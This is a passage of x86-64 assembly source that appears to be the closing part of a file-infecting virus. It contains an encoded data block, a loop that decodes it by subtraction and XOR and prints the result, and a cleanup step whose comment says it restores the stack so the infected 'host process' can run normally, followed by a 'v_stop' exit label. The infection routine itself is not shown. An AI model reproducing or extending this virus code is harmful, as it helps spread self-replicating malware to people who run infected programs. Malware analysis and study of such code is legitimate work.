520.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
521.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
522.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
523.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
524.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
525.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
526.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
527.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
528.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
529.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
530.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
531.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
532.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
533.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
534.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
535.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
536.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
537.             db 0x41
538.             len = $-msg
539.  
540.         payload:
541.             pop rsi                                             ; setting up decoding loop
542.             mov rcx, len
543.             lea rdi, [r15 + 3001]
544.  
545.             .decode:
546.                 lodsb                                           ; load byte from rsi into al
547.                 sub  al, 50                                     ; decoding it
548.                 xor  al, 5
549.                 stosb                                           ; store byte from al into rdi
550.                 loop .decode                                    ; sub 1 from rcx and continue loop until rcx = 0
551.  
552.             lea rsi, [r15 + 3001]                               ; decoded payload is at [r15 + 3000]
553.             mov rax, SYS_WRITE
554.             mov rdi, STDOUT                                     ; display payload
555.             mov rdx, len
556.             syscall
557.  
558. cleanup:
559.     add rsp, 5000                                               ; restoring stack so host process can run normally, this also could use some improvement
560.     pop rsp
561.     pop rdx
562.  
563. v_stop:
564.     xor rdi, rdi                                                ; exit code 0
565.     mov rax, SYS_EXIT
566.     syscall